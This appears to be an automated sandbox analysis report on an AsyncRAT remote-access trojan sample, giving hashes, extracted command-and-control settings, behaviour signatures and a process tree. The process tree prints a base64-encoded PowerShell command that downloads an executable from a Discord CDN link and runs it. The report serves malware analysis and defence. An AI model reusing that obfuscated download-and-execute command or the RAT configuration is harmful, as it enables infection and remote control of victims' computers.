Analysis
-
max time kernel
154s -
max time network
193s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
06-12-2022 07:01
General
-
Target
e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081.exe
-
Size
6KB
-
MD5
aacae33f1697d56d6ebbe91f49426380
-
SHA1
043d947a5ba9db57da8804ee1b3db6411c36a317
-
SHA256
e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081
-
SHA512
a150a3f35b00e7553d5aabb6e524cd0770d10714cd255665f4355f9922b91d400d2d2c0c276b18dba2bd999da210a4538754da9f38b819d2a2b3c947a75f6c20
-
SSDEEP
192:3m1I9XX1FrDl2ND2tLNtUq256XvW4NRcWedV:KI9Xl32NKNt/jvW4NRcW2V
Malware Config
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081.exe"C:\Users\Admin\AppData\Local\Temp\e03373744068eb32bc09755df8ff0f111f93a47d94a9cca7513adac83a92d081.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZABrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADAAMQAyADIAMwA2ADkAMAAzADQAMQAvAHAAbABsAG0AbQBkAGkAaQBwAG0ALgBlAHgAZQAnACwAIAA8ACMAeABjAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGoAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBHADMALgBlAHgAZQAnACkAKQA8ACMAZwByAHkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB1AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAcABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcAMwAuAGUAeABlACcAKQA8ACMAdwBrAGsAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\JDSG3.exe"C:\Users\Admin\AppData\Roaming\JDSG3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeFilesize
14.7MB
MD52cbd5d9d43c5c49f0580975e9e620808
SHA117e209b6d6c66882ed78a40d7e0d211760b489a0
SHA256399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403
SHA51226e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeFilesize
14.7MB
MD52cbd5d9d43c5c49f0580975e9e620808
SHA117e209b6d6c66882ed78a40d7e0d211760b489a0
SHA256399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403
SHA51226e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812
-
memory/2124-132-0x00000000000F0000-0x00000000000F8000-memory.dmpFilesize
32KB
-
memory/2124-135-0x00007FFA120F0000-0x00007FFA12BB1000-memory.dmpFilesize
10.8MB
-
memory/3080-136-0x00007FFA120F0000-0x00007FFA12BB1000-memory.dmpFilesize
10.8MB
-
memory/3080-137-0x00007FFA120F0000-0x00007FFA12BB1000-memory.dmpFilesize
10.8MB
-
memory/3080-134-0x000002C439270000-0x000002C439292000-memory.dmpFilesize
136KB
-
memory/3080-133-0x0000000000000000-mapping.dmp
-
memory/3080-141-0x00007FFA120F0000-0x00007FFA12BB1000-memory.dmpFilesize
10.8MB
-
memory/4820-146-0x0000000000000000-mapping.dmp
-
memory/4820-147-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4896-138-0x0000000000000000-mapping.dmp
-
memory/4896-142-0x00000000002D0000-0x0000000001180000-memory.dmpFilesize
14.7MB
-
memory/4896-143-0x0000000006DA0000-0x0000000007344000-memory.dmpFilesize
5.6MB
-
memory/4896-144-0x0000000006450000-0x00000000064E2000-memory.dmpFilesize
584KB
-
memory/4896-145-0x00000000065A0000-0x000000000663C000-memory.dmpFilesize
624KB